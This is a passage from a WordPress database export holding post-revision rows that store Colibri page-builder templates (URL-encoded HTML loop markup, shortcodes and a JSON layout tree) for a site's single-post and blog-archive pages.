class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22432-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22432-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20colibri-post-thumbnail-has-placeholder%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%20colibri-post-content%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n            <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n                </div>\n                <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_post','','inherit','closed','closed','','31-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',31,'https://gsudice.dataconn.net/?p=78',0,'revision','',0),(79,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"34-m27\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":107,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"34-m28\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":108,\"type\":\"main\"}],\"id\":\"34-m26\",\"parentId\":\"34-m25\",\"partialId\":34,\"styleRef\":106,\"type\":\"main\"}],\"id\":\"34-m25\",\"parentId\":\"34-m2\",\"partialId\":34,\"styleRef\":105,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"slot\":null,\"parentId\":\"34-m4\",\"index\":0,\"id\":\"34-m5\",\"partialId\":34,\"styleRef\":111,\"type\":\"main\",\"props\":{\"showPlaceholder\":false}},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"100\"}}}}},\"id\":\"34-m7\",\"parentId\":\"34-m6\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"separator\":\"| \",\"showIcons\":false,\"dateFormat\":\"M j\"},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m8\",\"partialId\":34,\"styleRef\":114,\"type\":\"main\"},{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":false},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m9\",\"partialId\":34,\"styleRef\":115,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"id\":\"34-m10\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":116,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-excerpt\",\"id\":\"34-m11\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":117,\"type\":\"main\",\"props\":{\"maxLength\":\"16\"}}],\"styleRef\":113,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m6\",\"partialId\":34,\"styleRef\":112,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m13\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":true,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":true,\"separator\":\"\"},\"slot\":null,\"parentId\":\"34-m13\",\"index\":0,\"id\":\"34-m14\",\"partialId\":34,\"styleRef\":120,\"type\":\"main\"}],\"styleRef\":119,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m15\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"34-m17\",\"parentId\":\"34-m16\",\"partialId\":34,\"styleRef\":123,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m15\",\"index\":0,\"id\":\"34-m16\",\"partialId\":34,\"styleRef\":122,\"type\":\"main\"}],\"styleRef\":121,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m12\",\"partialId\":34,\"styleRef\":118,\"type\":\"main\"}],\"id\":\"34-m4\",\"parentId\":\"34-m3\",\"partialId\":34,\"styleRef\":110,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"34-m2\",\"index\":0,\"id\":\"34-m3\",\"partialId\":34,\"styleRef\":109,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m19\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m19\",\"index\":0,\"id\":\"34-m20\",\"partialId\":34,\"styleRef\":126,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"prevLabel\":\"Previous\",\"stateType\":\"hover\"}}],\"styleRef\":125,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m21\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"34-m21\",\"index\":0,\"id\":\"34-m22\",\"partialId\":34,\"styleRef\":128,\"type\":\"main\",\"props\":{\"stateType\":\"\"}}],\"styleRef\":127,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m23\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m23\",\"index\":0,\"id\":\"34-m24\",\"partialId\":34,\"styleRef\":130,\"type\":\"main\",\"props\":{\"stateType\":\"hover\"}}],\"styleRef\":129,\"type\":\"main\"}],\"parentId\":\"34-m2\",\"index\":1,\"id\":\"34-m18\",\"partialId\":34,\"styleRef\":124,\"type\":\"main\"}],\"parentId\":\"34-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Posts\",\"attrs\":{\"id\":\"blog-posts\"}},\"id\":\"34-m2\",\"partialId\":34,\"styleRef\":104}],\"id\":\"34-m1\",\"partialId\":34,\"styleRef\":103,\"type\":\"main\"}','','','inherit','closed','closed','','35-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',35,'https://gsudice.dataconn.net/?p=79',0,'revision','',0),(80,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n          <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22435-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%22435-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22435-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22435-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22435-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/